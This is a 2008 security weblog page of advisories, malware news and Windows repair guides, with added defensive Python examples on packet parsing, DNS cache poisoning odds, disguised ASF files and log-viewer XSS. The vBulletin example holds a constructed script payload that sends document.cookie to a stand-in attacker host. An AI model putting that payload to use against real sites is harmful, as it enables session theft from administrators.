Smokey's Security Weblog

veritas odium parit

Highly Critical Vulnerabilities Reported in Unreal Tournament 3

Secunia, a vulnerability intelligence provider, reported today two highly critical vulnerabilities in Unreal Tournament 3 versions 1.2 and 1.3beta4. The vulnerabilities were discovered by Luigi Auriemma.

Vulnerability 1: a flaw in the handling of a specific packet type. The packet carries a 16-bit field that specifies the size of the data that follows; if that data is longer than about 172 bytes, memory corruption occurs, allowing an attacker to control various registers and potentially execute malicious code.

Successful exploitation may allow execution of arbitrary code.

Vulnerability 2: if the size declared in that same field is larger than the total size of the packet, the string is never read and a NULL pointer dereference occurs. This bug is easy to recognise on the server, because the message “Error: Attempted to multiply free a voice packet” is displayed before the crash when the malformed packet arrives.

Both vulnerabilities are unpatched at the time of writing. Until a fix is available, run UT3 servers only on trusted networks, or restrict access to the game ports with a firewall.
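The two bugs are the two halves of one missing bounds check: a length field trusted against the destination buffer (vulnerability 1) and against the datagram itself (vulnerability 2). The following is an added example, not code from UT3 or from the advisory: the real server code is native, and the advisory does not give the packet layout, so the little-endian 16-bit size field, the 172-byte buffer and the packet builder below are assumptions used only to show how a parser should validate such a field before touching the data.

```python
import struct

# Constructed model of the packet the advisory describes: a 16-bit size field
# followed by that many bytes of data. The advisory does not give the real UT3
# wire layout, so the little-endian field and the 172-byte destination buffer
# are assumptions used only to illustrate the two checks a parser needs.
SIZE_FIELD = struct.Struct("<H")
FIXED_BUFFER = 172  # "about 172 bytes" per the advisory

def classify_voice_packet(pkt: bytes) -> str:
    """Name the failure a naive parser would hit on this packet.

    "truncated"    - declared size exceeds the bytes actually present
                     (vulnerability 2: string never read, NULL pointer dereference)
    "too_long"     - declared size exceeds the fixed destination buffer
                     (vulnerability 1: memory corruption, attacker controls registers)
    "short_header" - not even a complete size field
    "ok"           - consistent packet
    """
    if len(pkt) < SIZE_FIELD.size:
        return "short_header"
    (declared,) = SIZE_FIELD.unpack_from(pkt, 0)
    available = len(pkt) - SIZE_FIELD.size
    if declared > available:       # bound against the datagram first: never read past it
        return "truncated"
    if declared > FIXED_BUFFER:    # then bound against the destination buffer
        return "too_long"
    return "ok"

def parse_voice_packet(pkt: bytes):
    """Hardened parse: returns (status, payload); payload is None unless status is "ok"."""
    status = classify_voice_packet(pkt)
    if status != "ok":
        return status, None
    (declared,) = SIZE_FIELD.unpack_from(pkt, 0)
    return status, bytes(pkt[SIZE_FIELD.size:SIZE_FIELD.size + declared])

def build_packet(declared: int, payload: bytes) -> bytes:
    """Constructed test input: a packet whose size field may lie about the payload."""
    return SIZE_FIELD.pack(declared) + payload

if __name__ == "__main__":
    for name, pkt in [
        ("benign", build_packet(100, b"A" * 100)),
        ("overflow attempt", build_packet(300, b"A" * 300)),
        ("crash attempt", build_packet(500, b"A" * 100)),
    ]:
        print(f"{name:17s} -> {classify_voice_packet(pkt)}")
```

The order of the checks matters: comparing the declared size against the bytes actually received comes first, so the parser never reads beyond the datagram, and only then is the size compared against the buffer it will be copied into.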


July 31, 2008 | Posted in Advisories, Alerts, Malware, Recommended External Security Related Links, Vulnerabilities | 1 Comment

DNS Exploit Means Quick Patches Are Critical: patch immediately!

IOActive’s Dan Kaminsky discovered a flaw in the Internet’s Domain Name System (DNS) software, and now that the developers of the Metasploit framework have published attack code for it, security experts are saying that everything that uses DNS, from desktop PCs to mainframes, needs to be patched immediately or network security is at risk.

Researchers have released software that exploits the DNS flaw whose details were leaked recently. That may mean IT admins are in for a long weekend of implementing and testing the patch.
IOActive researcher Dan Kaminsky went public with the bug earlier this month. The attack code was released on Wednesday by the developers of the Metasploit framework, led by HD Moore.

By poisoning the cache of a recursive resolver, an attacker can redirect all of that resolver’s users (an ISP’s entire customer base, for example) to a malicious phishing server every time they try to visit a legitimate Web site. The patches released by the various vendors, which make resolvers send queries from random UDP source ports in addition to using random transaction IDs, should protect against the attack, but rolling them out may be a rush for some.

Andrew Storms, director of security for nCircle, said: “Everything that uses DNS needs to be patched; desktop PCs, servers, routers, switches, firewalls and mainframes, and every vendor [like] Cisco, Sun, Microsoft and Apple. Basically, this patch impacts the entire network from soup to nuts.”

Source: NEWSFACTOR.com
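Why the patch helps is easier to see with numbers. An unpatched resolver accepts a forged answer if the attacker guesses the 16-bit transaction ID, and Kaminsky’s trick (asking for a fresh random subdomain each time) lets the attacker retry without waiting for a cached record to expire. Source-port randomisation multiplies the guess space by the number of possible ports. The following is an added illustration, not code from the article or from any resolver: a closed-form estimate plus a toy simulation of the attack against a fixed-port and a random-port resolver model. The fixed port number and the flood sizes are assumptions.

```python
import random

TXID_SPACE = 1 << 16   # 16-bit DNS transaction ID
PORT_SPACE = 1 << 16   # UDP source ports; real resolvers draw from a smaller ephemeral range

def spoof_success_probability(forged_replies, id_space=TXID_SPACE, port_space=1):
    """Chance that at least one of `forged_replies` forged answers matches the
    pending query's (TXID, source port) pair. port_space=1 models an unpatched
    resolver whose source port the attacker already knows."""
    space = id_space * port_space
    return 1.0 - (1.0 - 1.0 / space) ** forged_replies

def simulate_poisoning(rounds, forged_per_round, randomize_port, rng):
    """Toy model of the Kaminsky attack. Each round the attacker makes the
    resolver look up a fresh random subdomain of the target (so no TTL wait
    between attempts) and floods forged answers with guessed TXIDs. Without
    source-port randomisation the attacker knows the port; with it the guess
    must hit both fields. Returns the number of rounds that were poisoned."""
    FIXED_PORT = 32768  # assumed constant source port of an unpatched resolver
    poisoned = 0
    for _ in range(rounds):
        txid = rng.randrange(TXID_SPACE)
        port = rng.randrange(PORT_SPACE) if randomize_port else FIXED_PORT
        for _ in range(forged_per_round):
            guessed_id = rng.randrange(TXID_SPACE)
            guessed_port = rng.randrange(PORT_SPACE) if randomize_port else FIXED_PORT
            if guessed_id == txid and guessed_port == port:
                poisoned += 1
                break
    return poisoned

def compare_fixed_vs_random(rounds=300, forged_per_round=3000, seed=2008):
    """Run the same flood against an unpatched and a patched resolver model."""
    fixed = simulate_poisoning(rounds, forged_per_round, False, random.Random(seed))
    randomized = simulate_poisoning(rounds, forged_per_round, True, random.Random(seed))
    return fixed, randomized

if __name__ == "__main__":
    print("P(hit) with 65536 forged replies, fixed port :", spoof_success_probability(65536))
    print("P(hit) with 65536 forged replies, random port:",
          spoof_success_probability(65536, port_space=PORT_SPACE))
    fixed, randomized = compare_fixed_vs_random()
    print(f"rounds poisoned out of 300: fixed port={fixed}, random port={randomized}")
```

With a fixed port, 65536 forged replies give roughly a 63% chance per attempt, and since attempts can be repeated at will, poisoning is a matter of minutes; with a random port the same flood has a chance in the order of one in 100,000. To check a resolver from the outside, DNS-OARC offered a public test at the time: querying the TXT record of porttest.dns-oarc.net through the resolver reports whether its source ports look random.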

July 27, 2008 | Posted in Advisories, Alerts, Malware, News, Recommended External Security Related Links, Vulnerabilities | 1 Comment

Researchers Raise Alarm Over New Iteration of Coreflood Botnet

The seven-year-old Coreflood botnet is quietly stealing thousands of passwords from corporate users and other large organizations, thanks to recent enhancements that allow it to spread like a worm, researchers say.
In a nutshell, Coreflood has combined its old ability to deliver a password-stealing Trojan with a new ability to infect whole Windows domains in a matter of hours.

“This is potentially way more malicious than Storm, because it is collecting passwords — rather than just sending out spam or denying service — and because the user doesn’t have to click on a link or do anything at all in order to be infected,” says David Jevans, CEO of security vendor IronKey and chairman of the Anti-Phishing Working Group.

Coreflood, which started out as a simple Trojan in late 2001, has gone through more than 100 revisions during its long lifespan. With the recent enhancements, the Trojan can infect a Windows administrator’s machine and then use the administrator’s privileges to infect every other machine in that domain, which is a reminder that accounts with domain-wide administrative rights should not be used for day-to-day work on ordinary workstations.

“We’ve literally seen situations where there was only one machine infected, and within a few hours, 30,000 other machines on the same network were also infected,” Jevans says. “And these aren’t random infections — if it gets through to one administrator’s machine, then all of the devices in his domain will be infected.”

Source/full article: Tim Wilson/DarkReading

July 26, 2008 | Posted in Advisories, Alerts, Malware, Recommended External Security Related Links, Vulnerabilities | Leave a comment

How to recover a really dead Windows XP (SP2/SP3) TCP/IP stack

About this article

Author/source: Hublerb – Tech Support Guy

– Complete destruction and restoration of dead TCP/IP stack
– Recovery from fatal failure or partial or complete corruption of TCP/IP

Related error messages / occurrences

– IP Driver Error Code 2.
– TCP/IP network transport is not installed error message from active sync.
– TCP/IP driver missing from devmgmt.msc showing hidden devices.
– Ipconfig produces immediate failure message.
– An internal error occurred: The request is not supported.
– Unable to query host name.
– The specified device instance handle does not correspond to a present device message regarding DHCP service in services.msc
– Net start tcpip >>> fails with system error 2, The system cannot find the file specified.
– Ping error: Unable to contact IP driver, error code 2.
– Repair Local Area Connection: Failed to query TCP/IP settings of the connection. Cannot proceed.
– TCP/IP Protocol Driver Service Failed To Start, system cannot find the file specified.
– The TCP/IP Protocol Driver service failed to start due to the following error: The system cannot find the file specified.

Failed repair methods

– Netsh int ip reset resetlog.txt >>> no effect
– Non-full reinstall of TCP/IP using only the have disk method. >>> no effect
– Netsh Winsock reset >>> no effect
– Winsockxpfix >>> no effect
– Reinstalling network card >>> no effect

Solutions

Repair install

1. Insert and boot from your WindowsXP CD
2. At the second R=Repair option, press the R key
3. This will start the repair
4. Press F8 for I Agree at the Licensing Agreement
5. Press R when the directory where WindowsXP is installed is shown. Typically this is C:\WINDOWS
6. It will then check the C: drive and start copying files
7. It will automatically reboot when needed. Keep the CD in the drive.
8. You will then see the graphic part of the repair that is like during a normal install of XP (Collecting Information, Dynamic Update, Preparing Installation, Installing Windows, Finalizing Installation)
9. When prompted, click on the Next button
10. When prompted, enter your XP key
11. Normally you will want to keep the same Workgroup or Domain name
12. The computer will reboot
13. Then you will have the same screens as a normal XP Install
14. Activate if you want (usually a good idea)
15. Register if you want (but not necessary)
16. Finish. Note that a repair install takes Windows back to the patch level of the CD: re-apply the service pack (if the CD predates SP3) and all later security updates, and keep the machine behind a firewall or off untrusted networks until that is done.

Hardcore method when nothing else is working

Step #1

1. Locate the Nettcpip.inf file in %SystemRoot%\inf (normally C:\WINDOWS\inf), and then open the file in Notepad.
2. Locate the [MS_TCPIP.PrimaryInstall] section.
3. Edit the Characteristics = 0xa0 entry and replace 0xa0 with 0x80. (0xa0 is NCF_HAS_UI combined with NCF_NOT_USER_REMOVABLE; clearing the 0x20 bit is what makes the Uninstall button available in step 10.)
4. Save the file, and then exit Notepad.
5. In Control Panel, double-click Network Connections, right-click Local Area Connection, and then select Properties.
6. On the General tab, click Install, select Protocol, and then click Add.
7. In the Select Network Protocols window, click Have Disk.
8. In the Copy manufacturer’s files from: text box, type c:\windows\inf, and then click OK.
9. Select Internet Protocol (TCP/IP), and then click OK.
Note: this step will return you to the Local Area Connection Properties screen, but now the Uninstall button is available.
10. Select Internet Protocol (TCP/IP), click Uninstall, and then click Yes.
11. Restart

Successful uninstallation of TCP/IP will remove numerous keys from the registry, including:

HKLM\SYSTEM\CurrentControlSet\Services\Tcpip
HKLM\SYSTEM\CurrentControlSet\Services\Dhcp
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
HKLM\SYSTEM\CurrentControlSet\Services\IPSec
HKLM\SYSTEM\CurrentControlSet\Services\PolicyAgent
HKLM\SYSTEM\CurrentControlSet\Services\AtmArpC
HKLM\SYSTEM\CurrentControlSet\Services\Nla

These represent various interconnected and interdependent services.

For good measure you should also delete the following keys before reinstalling TCP/IP in step #2 (export them first from Regedit via File > Export, so they can be restored if the reinstall fails):

HKLM\SYSTEM\CurrentControlSet\Services\Winsock
HKLM\SYSTEM\CurrentControlSet\Services\Winsock2

Step #2

Reinstall of TCP/IP

Following substep #3 above, change the 0x80 back to 0xa0. Nettcpip.inf is covered by a signed catalog, so restoring its original contents removes the “unsigned driver” error that was encountered during the uninstallation phase.

Return to “local area connection”> properties > general tab > install > Protocol > TCP/IP

You may receive an “Extended Error” failure when trying to reinstall TCP/IP; this is related to the installer subsystem conflicting with the state of the local security database (secedit.sdb).

To check the integrity of the security database:
esentutl /g c:\windows\security\Database\secedit.sdb

There may be a message saying the database is out of date.
First try the recovery option:
esentutl /r c:\windows\security\Database\secedit.sdb

If that does not work for you, you need the repair option. Note that /p is a lossy repair that can discard damaged records, so copy secedit.sdb somewhere safe first:
esentutl /p c:\windows\security\Database\secedit.sdb

Rerun the /g option to ensure that integrity is good and the database is up to date.

Now return to Local Area Connection > Properties > General tab.
Choose Install > Protocol > TCP/IP and try again.

Reboot.


July 20, 2008 | Posted in Advisories, Friends, Uncategorized | 86 Comments

New kind of malicious software could pose a danger to Windows users who download music files on peer-to-peer networks


The new malware inserts links to dangerous Web pages within ASF (Advanced Systems Format) media files.

“The possibility of this has been known for a little while but this is the first time we’ve seen it done,” said David Emm, senior technology consultant for security vendor Kaspersky Lab.

If a user plays an infected music file, it will launch Internet Explorer and load a malicious Web page which asks the user to download a codec, a well-known trick to get someone to download malware.

The actual download is not a codec but a Trojan horse, which installs a proxy program on the PC, Emm said. The proxy program allows hackers to route other traffic through the compromised PC, helping the hacker essentially cover their tracks for other malicious activity, Emm said.

The malware has worm-like qualities. Once on a PC, it looks for MP3 or MP2 audio files, transcodes them to Microsoft’s Windows Media Audio format, wraps them in an ASF container and adds links to further copies of the malware, in the guise of a codec, according to another security vendor, Secure Computing.

The “.mp3” extension of the files is not modified, however, so victims may not immediately notice the change, according to Kaspersky Lab.

“Users downloading from P2P networks need to exercise caution anyway, but should also be sensitive to pop-ups appearing upon playing a downloaded video or audio stream,” Secure Computing said.

Trend Micro calls the malware “Troj_Medpinch.a”, Secure Computing named it “Trojan.ASF.Hijacker.gen” and Kaspersky calls it “Worm.Win32.GetCodec.a”.

Source / full article: PCWorld Business Center
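The detail that makes these files detectable is the one Kaspersky points out: the extension still says .mp3 while the content is an ASF container, and that container carries a URL. Both are cheap to check without playing the file. The following is an added example, not code from any of the vendors quoted: a content sniffer that classifies a file by its leading bytes and looks for URLs stored as ASCII or UTF-16LE (the encoding ASF uses for its strings). The sample “hijacked” file and the URL in it are constructed for the demonstration, and the layout after the header GUID is a simplification, not a complete ASF structure.

```python
import re

# ASF_Header_Object GUID {75B22630-668E-11CF-A6D9-00AA0062CE6C} as it appears
# on disk (first three fields little-endian). Every ASF/WMA/WMV file starts with it.
ASF_HEADER_GUID = bytes.fromhex("3026B2758E66CF11A6D900AA0062CE6C")
URL_RE = re.compile(r"https?://[\x21-\x7e]+")

def sniff_audio_container(data: bytes) -> str:
    """Classify a file by its leading bytes, ignoring the extension."""
    if data.startswith(ASF_HEADER_GUID):
        return "asf"
    if data.startswith(b"ID3"):
        return "mp3"                       # ID3v2 tag ahead of MPEG audio
    if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
        return "mp3"                       # bare MPEG audio frame sync (11 set bits)
    return "unknown"

def embedded_urls(data: bytes) -> list:
    """URLs stored either as ASCII or as UTF-16LE (ASF stores its strings as UTF-16LE)."""
    found = set(URL_RE.findall(data.decode("latin-1")))
    for offset in (0, 1):                  # try both 16-bit alignments
        wide = data[offset:]
        wide = wide[: len(wide) - len(wide) % 2]
        found.update(URL_RE.findall(wide.decode("utf-16-le", errors="ignore")))
    return sorted(found)

def assess(filename: str, data: bytes):
    """Return (suspicious, reasons) for a downloaded audio file."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    kind = sniff_audio_container(data)
    reasons = []
    if ext in ("mp3", "mp2") and kind == "asf":
        reasons.append("extension claims MPEG audio but the content is an ASF container")
    if kind == "asf":
        urls = embedded_urls(data)
        if urls:
            reasons.append("ASF container carries URL(s): " + ", ".join(urls))
    return bool(reasons), reasons

def build_sample_asf(url: str) -> bytes:
    """Constructed test input, not a real media file: header GUID, 64-bit object
    size, then a NUL-terminated UTF-16LE string where a script command would sit."""
    body = url.encode("utf-16-le") + b"\x00\x00"
    size = len(ASF_HEADER_GUID) + 8 + len(body)
    return ASF_HEADER_GUID + size.to_bytes(8, "little") + body

# Constructed samples: a hijacked "mp3" and a harmless one with an ID3v2 header.
SAMPLE_DISGUISED = build_sample_asf("http://codec.example.invalid/setup.exe")  # hypothetical URL
SAMPLE_REAL_MP3 = b"ID3\x03\x00\x00" + b"\x00" * 4 + b"\xff\xfb\x90\x00" + b"\x00" * 32

if __name__ == "__main__":
    for name, blob in [("song.mp3", SAMPLE_DISGUISED), ("song.mp3", SAMPLE_REAL_MP3)]:
        print(name, sniff_audio_container(blob), assess(name, blob))
```

A URL inside a media container is not proof of malice (legitimate WMA files can carry links too), which is why the extension/content mismatch is reported separately: a file that claims to be MP3 but is really ASF is the stronger signal for this particular family.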

July 18, 2008 | Posted in Advisories, Alerts, Downloads, Malware, News, Recommended External Security Related Links | Leave a comment

Microsoft Security Bulletin MS08-033 (Critical): Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)

Published: June 10, 2008 | Updated: July 16, 2008

This security update resolves two privately reported vulnerabilities in Microsoft DirectX that could allow remote code execution if a user opens a specially crafted media file. An attacker who successfully exploited either of these vulnerabilities could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

This security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008.

The security update addresses the vulnerabilities by modifying the way that DirectX handles MJPEG and SAMI format files.

Microsoft recommends that customers apply the update immediately.

Source / full article / download: Microsoft TechNet

July 18, 2008 | Posted in Advisories, Alerts, Downloads, Malware, Recommended External Security Related Links, Vulnerabilities | Leave a comment

heise SSL Guardian: protection against unsafe SSL certificates

HTTPS connections are often used to transfer important data, such as passwords, PINs, or credit card numbers. The browser ensures that the server can be identified with a valid certificate and that the transferred data are encrypted. A bug in the Debian Linux distribution’s OpenSSL package (shipped from 2006 until May 2008) crippled the random number generator, so that keys generated on affected systems come from a tiny, enumerable set and are child’s play to crack. Many servers still use these weak certificates, even though it is impossible to establish a secure connection with them. The heise SSL Guardian checks SSL certificates and warns you when it detects a weak one.

All Windows applications that use Windows CryptoAPI will be protected by SSL Guardian. This includes Internet Explorer and Outlook Express, as well as Windows Mail. However, SSL Guardian does not protect Firefox and Opera as these use their own crypto libraries and not CryptoAPI. In order to protect Firefox, the Firefox SSL Blacklist extension is needed, as this has a similar function.

SSL Guardian supports Windows 2000, XP and Vista and is free.
There are two versions with different sized blacklists. The first is for users that have adequate bandwidth and time. The second is a third as large, but still detects more than 98% of the weak certificates.

More info and download: heise Security

July 12, 2008 | Posted in Advisories, Downloads, Friends, News, Recommended External Security Related Links, Vulnerabilities | Leave a comment

F-Secure Client Security Version 7.12 Released

This service release fixes issues from the previous version of the product. For details, please see the Release Notes.

What is new in 7.1x release:

- Windows Vista support: F-Secure Client Security 7.1x supports 32-bit versions of Windows Vista.
- Improved real-time scanning performance on removable drives: enhanced scanning logic enables faster scanning of large files that reside on removable drives.
- Updated scanning report: the scanning report now explains in more detail why certain files have been skipped.
- Faster spyware removal: spyware removal is significantly faster in this release. Previously the spyware scan was restarted on removal; now the scan keeps track of its state.
- Reduced memory consumption: the product has been optimised to use significantly less memory, which shows as improved overall performance.
- Internet Shield IPv6 support: IPv6 support in Internet Shield is now two-fold. The minimal Internet Protocol version 6 support lets the user block all IPv6 traffic if needed; this is extended with the ability to create firewall rules and handle IPv6 alerts in application control for IPv6 addresses. The extension is limited to Vista, while the minimal support is available on all supported platforms.
- Updated identification and removal of conflicting programs (sidegrade): sidegrade has been updated to include more common conflicting products, and cleaned of unnecessary removals of products that would not conflict with the software.
- New manual database installation tool: a new tool for updating protection databases manually, called fsdbupdate, installs all the latest database updates for customers with a valid subscription.
- Improved System Control with DeepGuard for the latest malware types: System Control with DeepGuard has been updated to protect against the very latest types of malware attacks.
- Remote Application List for System Control: the administrator can configure System Control to deny or allow applications remotely with Policy Manager.
- Includes all previous hotfixes.

This release is for the following operating systems:

- Windows Vista 32-bit, SP1
- Windows XP Home Edition with SP0 / SP1 / SP2 / SP3
- Windows XP Professional Edition with SP0 / SP1 / SP2 / SP3
- Windows XP Media Center Edition with SP1
- Windows 2000 Workstation with SP4 Rollup 1 or higher

Note: when F-Secure Client Security 7.1x is taken into use, F-Secure Policy Manager needs to be version 7.1x or later.

Product home page: F-Secure

July 12, 2008 | Posted in Advisories, Alerts, Downloads, Friends, News, Recommended External Security Related Links | Leave a comment

Highly critical vulnerabilities reported in vBulletin

Some highly critical vulnerabilities have been reported in vBulletin, which can be exploited by malicious people to conduct script insertion attacks.

Input passed via “PHP_SELF” or via the “do” parameter when requesting a missing page is not properly sanitised before being logged. This can be exploited to insert arbitrary HTML and script code, which is executed in an administrator’s browser session in context of an affected site when the malicious logs are being viewed.

Reportedly, the vulnerabilities can be exploited to inject and execute arbitrary PHP code on an affected system.

The vulnerabilities affect versions 3.7.2 and 3.6.10 PL2. Prior versions may also be affected.

Solution: update to version 3.7.2 PL1 or 3.6.10 PL3.

Sources: Secunia and vBulletin.
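The pattern behind this advisory is stored XSS through a log viewer: the values are recorded raw (which is fine) and later rendered into an administrator’s page without escaping (which is not). The following is an added example, not vBulletin’s code: a constructed model of the logging step and of two log viewers, one that injects the recorded values straight into HTML and one that escapes them at output time. The field names and markup are assumptions. Note that PHP_SELF includes any PATH_INFO from the request, so a request for /index.php/"><script>...</script> puts markup into that variable; SCRIPT_NAME is the safer choice when only the script path is needed.

```python
import html

# Constructed model of the logging and admin log viewer the advisory describes:
# the forum records PHP_SELF and the "do" parameter of requests for missing pages,
# and an administrator later views those records in the browser. Names, fields
# and markup are assumptions; this is not vBulletin's code.

def log_missing_page(log, php_self, do_param, when="2008-07-12 00:00:00"):
    """Store the raw request data. Logging raw values is fine; the mistake the
    advisory describes is rendering them into HTML without escaping later."""
    log.append({"when": when, "script": php_self, "do": do_param})

def render_log_unsafe(log):
    """Vulnerable viewer: attacker-controlled strings go straight into the page,
    so the script runs in the administrator's session when the log is viewed."""
    rows = "".join(
        f"<tr><td>{e['when']}</td><td>{e['script']}</td><td>{e['do']}</td></tr>" for e in log
    )
    return f"<table>{rows}</table>"

def render_log_safe(log):
    """Hardened viewer: every untrusted value is HTML-escaped at output time
    (quote=True also neutralises injection inside attribute values)."""
    def cell(value):
        return f"<td>{html.escape(str(value), quote=True)}</td>"
    rows = "".join(f"<tr>{cell(e['when'])}{cell(e['script'])}{cell(e['do'])}</tr>" for e in log)
    return f"<table>{rows}</table>"

def contains_active_markup(rendered):
    """Crude check used here only to compare the two renderers: an unescaped
    tag that the browser would parse as script or as an image with a handler."""
    lowered = rendered.lower()
    return "<script" in lowered or "<img" in lowered

# Constructed attacker input. PHP_SELF includes PATH_INFO, so a request for
# /index.php/"><script>...</script> puts markup into that variable; the "do"
# parameter is ordinary query-string input. The host name is hypothetical.
ATTACK_PHP_SELF = '/index.php/"><script>document.location="http://attacker.example.invalid/?"+document.cookie</script>'
ATTACK_DO = '<img src=x onerror=alert(1)>'

def demo():
    """Log one hostile request and render it with both viewers."""
    log = []
    log_missing_page(log, ATTACK_PHP_SELF, ATTACK_DO)
    return render_log_unsafe(log), render_log_safe(log)

if __name__ == "__main__":
    unsafe, safe = demo()
    print("unsafe viewer executes script:", contains_active_markup(unsafe))
    print("safe viewer executes script:  ", contains_active_markup(safe))
```

Escaping belongs at the point where the value meets HTML, not at logging time: a value sanitised for HTML is wrong for a plain-text or JSON export of the same log, and a second output path that forgets to escape reintroduces the bug.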

July 12, 2008 | Posted in Advisories, Alerts, Downloads, Malware, Recommended External Security Related Links, Vulnerabilities | 1 Comment

Smokey’s Security Forums down past 2 days

For the past two days Smokey’s Security Forums was down. The cause was an unusual and completely unexpected combination of events all happening at the same time, finally solved this morning.

My apologies for the inconvenience.

Smokey

July 11, 2008 | Posted in Friends, News, Recommended External Security Related Links | Leave a comment

Apple updates Leopard to 10.5.4

Apple has released Mac OS X 10.5.4, the fourth update to Leopard since it was released last October.

The new version contains the usual mix of bug fixes and security updates, with iCal getting the most attention. iCal won’t delete events without telling you as a result of the latest update, for example, and Apple said the update “improves overall iCal reliability.” AirPort and Spaces & Exposé also received some updates.

There are also a couple of security-related fixes for Safari and other issues.

Source: Crave
Download: Apple Downloads

July 6, 2008 | Posted in Advisories, Alerts, Downloads, Friends, News, Recommended External Security Related Links, Vulnerabilities | Leave a comment

Microsoft Security Bulletin Advance Notification for July 2008

Published: July 3, 2008

Microsoft Security Bulletin Advance Notification issued: July 3, 2008
Microsoft Security Bulletins to be issued: July 8, 2008

This is an advance notification of security bulletins that Microsoft is intending to release on July 8, 2008.
This bulletin advance notification will be replaced with the July bulletin summary on July 8, 2008.

Executive Summaries

Important (4)

Bulletin Identifier: SQL Bulletin
Impact of Vulnerability: Elevation of Privilege
The update may require a restart.
Affected Software: Microsoft Windows, Microsoft SQL Server. For more information, see the Affected Software section.

Bulletin Identifier: Windows Bulletin 1
Impact of Vulnerability: Remote Code Execution
Affected Software: Microsoft Windows. For more information, see the Affected Software section.

Bulletin Identifier: Windows Bulletin 2
Impact of Vulnerability: Spoofing
The update requires a restart.
Affected Software: Microsoft Windows. For more information, see the Affected Software section.

Bulletin Identifier: Exchange Server Bulletin
Impact of Vulnerability: Elevation of Privilege
The update may require a restart.
Affected Software: Microsoft Exchange Server. For more information, see the Affected Software section.

Non-Security, High-Priority Updates on MU, WU, and WSUS

For information about non-security releases on Windows Update and Microsoft update, please see:

Microsoft Knowledge Base Article 894199: Description of Software Update Services and Windows Server Update Services changes in content for 2008. Includes all Windows content.

New, Revised, and Released Updates for Microsoft Products Other Than Microsoft Windows.

Disclaimer

The information provided in the Microsoft Knowledge Base is provided “as is” without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Source / Full Bulletin: Microsoft TechNet

July 5, 2008 | Posted in Advisories, Alerts, Downloads, Friends, Malware, News, Recommended External Security Related Links, Vulnerabilities | 1 Comment

Windows Vista Disappearing System Tray Icons Quick Fix

How-to for fixing missing icons in the Windows Vista system tray:

1. Back up the Registry by creating a restore point.
2. Go to Start > Run (or Windows-key + “R”), type in “regedit” and hit “OK”.
3. Navigate to the key “HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify”.
4. Delete the values “IconStreams” and “PastIconsStream”.
5. Open up the Task Manager (Ctrl + Shift + Esc), go to the “Processes” tab, select “explorer.exe” and click “End Process”.
6. Open the “Applications” tab and click “New Task…” at the bottom-right of the window.
7. In the message box that pops up type in “explorer.exe” and hit “OK”.
8. Explorer.exe will reload, and the missing icons should now be back in the system-tray where they belong.

Enjoy yourself! 😉

July 5, 2008 | Posted in Advisories, Downloads, Friends, Uncategorized | 38 Comments

Opera 9.51 Released (Recommended security and stability upgrade)

- July 3, 2008: Opera 9.51 released. This is a recommended security and stability upgrade: several highly critical vulnerabilities were present in all previous versions, so we recommend you upgrade as soon as possible!

Changes since Opera 9.5

User Interface

– Fine-tuned the new Opera skin.
– Improved drag/drop of tabs.
– Fixed problems with search engines when upgrading from Opera 9.2x.
– Fixed a stability issue when printing or when in print preview.
– Added an option to toggle mouse flips in opera:config (User Prefs – Enable Mouse Flips).
– Textarea inputs now clear when no-cache is set.
– Saving of images is no longer recorded in transfers.

Mail/News

– Feeds now show the first time when you subscribe.
– Corrected a stability issue that could occur when clicking the drop-down to switch views.
– Adjusted thread expanding in Mail when receiving new messages.
– Corrected a problem where multiple views (access points) show for the same account.

Display and Scripting

– Corrected a stability issue with User JS.
– Style sheets now load when navigating in history.
– window.close() now functions after invoking a context menu and when closing Opera Dragonfly.

Security

– Fixed an issue where <canvas> functions could reveal data from random places in memory, as reported by Philip Taylor. See the advisory.
– Fixed an issue that could be used to execute arbitrary code, as reported by Billy Rios. Details will be disclosed at a later date.
– Security status is now correctly set when navigating from HTTP to HTTPS.
– Corrected an issue related to OCSP and CRLs that would lower security.
— Note: This will take effect with the weekly update, or when checking manually for an update (Help > Check for Updates).

Miscellaneous

– Corrected a stability issue with Yahoo! Mail.
– TinyMCE 2.1.x editor now works properly.
– Printing of chat items has been improved.
– Reconnection of the IRC client has been adjusted and improved.
– Menus on deviantart.com now work properly.
– Eliminated unwanted line breaks in rich text editors.

Windows-specific changes

– Fixed a resource leak in the transfer window that could cause visual paint problems and other related problems.
– Command line parameters must now be specified before any URLs on the command line.

Source: Opera Software
Download Opera v9.51: Opera Software Download Section

July 5, 2008 | Posted in Advisories, Alerts, Downloads, Friends, News, Recommended External Security Related Links, Vulnerabilities | Leave a comment